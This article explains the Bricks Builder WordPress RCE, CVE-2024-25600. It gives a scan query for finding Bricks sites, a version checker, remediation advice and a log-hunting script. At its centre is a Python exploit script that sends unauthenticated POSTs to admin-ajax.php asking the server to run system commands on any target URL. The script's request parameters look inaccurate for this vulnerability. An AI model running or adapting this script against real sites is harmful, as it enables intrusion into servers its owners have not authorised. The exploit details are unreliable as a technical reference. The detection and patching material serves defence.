Exploiting Remote Code Execution in WordPress Bricks Builder CVE-2024-25600
Bricks Builder is a popular WordPress theme framework designed with a drag-and-drop interface for website construction. A critical security vulnerability identified as CVE-2024-25600 affects versions 1.9.6 and earlier. This flaw allows unauthenticated attackers to execute arbitrary code remotely, posing a severe risk to impacted sites.
Vulnerability Identification
Security researchers and asset-discovery tools can locate Bricks installations by searching for the theme's resource directory in HTTP response bodies, since every page served by a Bricks site loads its assets from that path. In the syntax of internet-scan search engines, the query is:

body="/wp-content/themes/bricks/"

A hit only tells you that a site uses the theme, not that it is vulnerable; the installed theme version still has to be established and compared against the fixed release, 1.9.6.1.

Technical Analysis
The vulnerability stems from a missing authorization check in the AJAX handler that renders builder elements. The handler, registered as the bricks_render_element action and reachable through admin-ajax.php, renders an element from caller-supplied settings and, in doing so, lets the caller run PHP code without first confirming that the caller is a user permitted to use the builder. By manipulating the request parameters, an attacker can turn this into execution of system commands on the web server.
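The search query in the identification section finds Bricks sites, and the analysis above only applies to versions before 1.9.6.1, so the practical next step is confirming the installed version. The following is an added example, not code from the article or from Bricks, that extracts the theme version from two public sources: the `?ver=` query string that WordPress appends to the theme's enqueued assets (treated here as a heuristic, since a theme may pass something other than its own version) and the `Version:` header of the theme's `style.css`, which is the authoritative WordPress theme header. The HTML and CSS inputs are constructed samples; the only facts taken from the page are the theme path and the fixed version.

```python
import re

# The directory every Bricks site loads its assets from (the search-engine fingerprint).
BRICKS_PATH = "/wp-content/themes/bricks/"
# First release that fixes CVE-2024-25600.
FIXED_VERSION = (1, 9, 6, 1)

# Heuristic (assumption): WordPress appends ?ver= to enqueued assets and the theme
# passes its own version. style.css below is the authoritative source when available.
ASSET_VER_RE = re.compile(r'/wp-content/themes/bricks/[^"\'\s<>]*\?ver=([0-9][0-9.]*)')
# "Version:" line of a theme's style.css, WordPress' standard theme header format.
STYLE_VER_RE = re.compile(r'^\s*Version:\s*([0-9][0-9.]*)', re.MULTILINE)

# Constructed sample responses; not captured from any real site.
SAMPLE_HTML_VULNERABLE = (
    '<!DOCTYPE html><html><head><link rel="stylesheet" '
    'href="https://example.com/wp-content/themes/bricks/assets/css/frontend.min.css?ver=1.9.6">'
    '</head><body></body></html>'
)
SAMPLE_HTML_PATCHED = SAMPLE_HTML_VULNERABLE.replace("?ver=1.9.6", "?ver=1.9.6.1")
SAMPLE_HTML_OTHER_THEME = (
    '<link rel="stylesheet" href="/wp-content/themes/twentytwentyfour/style.css?ver=1.0">'
)
SAMPLE_STYLE_CSS = "/*\nTheme Name: Bricks\nVersion: 1.9.5\n*/\n"


def parse_version(version):
    """'1.9.6.1' -> (1, 9, 6, 1); tuples compare the way theme versions should."""
    return tuple(int(part) for part in version.split(".") if part.isdigit())


def is_vulnerable_version(version):
    """Everything below 1.9.6.1 (i.e. 1.9.6 and earlier) is affected."""
    return parse_version(version) < FIXED_VERSION


def uses_bricks(html):
    """Same test as the body search query: the theme directory appears in the page."""
    return BRICKS_PATH in html


def version_from_assets(html):
    """Theme version as exposed by ?ver= on the theme's own asset URLs, if any."""
    match = ASSET_VER_RE.search(html)
    return match.group(1) if match else None


def version_from_style_css(css):
    """Theme version from the Version: header of /wp-content/themes/bricks/style.css."""
    match = STYLE_VER_RE.search(css)
    return match.group(1) if match else None


def assess(html, style_css=None):
    """Combine the checks: is Bricks present, which version, and is it below the fix."""
    result = {"bricks": uses_bricks(html), "version": None, "vulnerable": None}
    if not result["bricks"]:
        return result
    version = version_from_style_css(style_css) if style_css else None
    if version is None:
        version = version_from_assets(html)
    result["version"] = version
    if version:
        result["vulnerable"] = is_vulnerable_version(version)
    return result


if __name__ == "__main__":
    print(assess(SAMPLE_HTML_VULNERABLE))
    print(assess(SAMPLE_HTML_VULNERABLE, SAMPLE_STYLE_CSS))
    print(assess(SAMPLE_HTML_OTHER_THEME))
```

In practice the two inputs come from a GET of the site's front page and of `/wp-content/themes/bricks/style.css`, which WordPress serves publicly; prefer the `style.css` header over the asset query string whenever it is readable, and treat a version that is absent from both as unknown rather than safe.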
Proof of Concept
To verify the vulnerability, a crafted HTTP POST request can be sent to the admin-ajax.php endpoint. The following Python script demonstrates how to automate this process to check for the existence of the flaw by executing a benign command.
import requests
import sys


def exploit_target(target_site):
    # Construct the AJAX endpoint URL (tolerate a trailing slash on the target)
    ajax_endpoint = f"{target_site.rstrip('/')}/wp-admin/admin-ajax.php"
    # Prepare the payload to execute the benign 'id' command
    # Vulnerable parameter: 'elementType' allows arbitrary function execution
    payload = {
        'action': 'bricks_render_element',
        'elementType': 'php',
        'function': 'system',
        'args[0]': 'id'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    try:
        response = requests.post(ajax_endpoint, data=payload, headers=headers, timeout=10)
    except requests.exceptions.RequestException as conn_error:
        print(f"[!] Connection failed: {conn_error}")
        return
    # A 200 alone proves nothing: admin-ajax.php answers any registered action with
    # 200 regardless of what the handler did, and an unregistered action with 400
    # and a body of "0". Only the output of 'id' (a 'uid=' string) confirms execution.
    if response.status_code == 200 and 'uid=' in response.text:
        print("[+] Target appears vulnerable.")
        print("[+] Command Output:")
        print(response.text)
    else:
        print(f"[-] No command output (HTTP {response.status_code}); target does not look vulnerable.")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python script.py <target_url>")
        sys.exit(1)
    target = sys.argv[1]
    exploit_target(target)

Remediation
Administrators running Bricks Builder must update the theme to version 1.9.6.1 or later immediately; that release adds the authorization check the render handler lacked. If updating is not immediately possible, a Web Application Firewall rule is a reasonable temporary mitigation, but it should be scoped to the vulnerable action (requests to admin-ajax.php whose action parameter is bricks_render_element, and the equivalent REST route /wp-json/bricks/v1/render_element, which exposes the same handler) rather than to admin-ajax.php as a whole, which many plugins and the WordPress heartbeat rely on for ordinary front-end functionality. Blocking the endpoint is a stopgap only; the fix is the update.
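Because the mitigation above is to scope a rule to the render action rather than the whole endpoint, the same logic is what a responder wants for hunting: any call to the render handler from a client that is not logged in is anomalous, since the builder only runs for authenticated users. The following is an added example, not code from the article or from Bricks, that classifies request records from a reverse proxy or WAF that logs request bodies. The record shape (method, uri, content_type, body, cookies) is an assumption about such a log, the sample records are constructed, the WordPress login cookie prefix wordpress_logged_in_ is the real one, and the REST route is the one named in the remediation section, which the article's original text did not cover.

```python
from urllib.parse import urlparse, parse_qs

RENDER_ACTION = "bricks_render_element"
AJAX_PATH = "/wp-admin/admin-ajax.php"
# The same render handler is also reachable through the Bricks REST route.
REST_PATH = "/wp-json/bricks/v1/render_element"
# WordPress sets wordpress_logged_in_<COOKIEHASH> for authenticated sessions.
LOGGED_IN_PREFIX = "wordpress_logged_in_"

# Constructed request records; assumed shape of a body-logging proxy or WAF.
SAMPLE_REQUESTS = [
    {   # unauthenticated POST mirroring the proof-of-concept above
        "method": "POST", "uri": "/wp-admin/admin-ajax.php",
        "content_type": "application/x-www-form-urlencoded",
        "body": "action=bricks_render_element&elementType=php&function=system&args%5B0%5D=id",
        "cookies": "",
    },
    {   # same action from a logged-in editor: expected builder traffic
        "method": "POST", "uri": "/wp-admin/admin-ajax.php",
        "content_type": "application/x-www-form-urlencoded",
        "body": "action=bricks_render_element&elementType=container",
        "cookies": "wordpress_logged_in_0123abcd=editor%7C1700000000%7Ctoken%7Chash",
    },
    {   # ordinary front-end AJAX that a blanket admin-ajax.php block would break
        "method": "GET", "uri": "/wp-admin/admin-ajax.php?action=heartbeat",
        "content_type": "", "body": "", "cookies": "",
    },
    {   # the REST form of the same handler, unauthenticated
        "method": "POST", "uri": "/wp-json/bricks/v1/render_element",
        "content_type": "application/json",
        "body": '{"element": {"name": "container"}}',
        "cookies": "",
    },
]


def _form_params(record):
    """Merge query-string and form-body parameters; admin-ajax.php accepts either."""
    parsed = urlparse(record["uri"])
    params = parse_qs(parsed.query)
    if record["method"] == "POST" and "json" not in record.get("content_type", ""):
        params.update(parse_qs(record.get("body", "")))
    return params


def _is_authenticated(record):
    """True if the client presented a WordPress login cookie."""
    return LOGGED_IN_PREFIX in record.get("cookies", "")


def classify(record):
    """Return a reason string if the record invokes the render handler, else None."""
    path = urlparse(record["uri"]).path
    if path == AJAX_PATH:
        hit = RENDER_ACTION in _form_params(record).get("action", [])
    else:
        hit = path == REST_PATH
    if not hit:
        return None
    who = "authenticated" if _is_authenticated(record) else "unauthenticated"
    return f"{who} render_element"


def hunt(records):
    """Return (index, reason) for every record that reaches the render handler."""
    hits = []
    for index, record in enumerate(records):
        reason = classify(record)
        if reason:
            hits.append((index, reason))
    return hits


if __name__ == "__main__":
    for index, reason in hunt(SAMPLE_REQUESTS):
        print(f"[{index}] {reason}")
```

Standard combined-format access logs do not record POST bodies, so the action parameter is only visible there when it travels in the query string; run this against a proxy or WAF log that captures bodies, and treat every unauthenticated hit on a site that was below 1.9.6.1 at the time as a potential compromise to investigate rather than as a blocked probe.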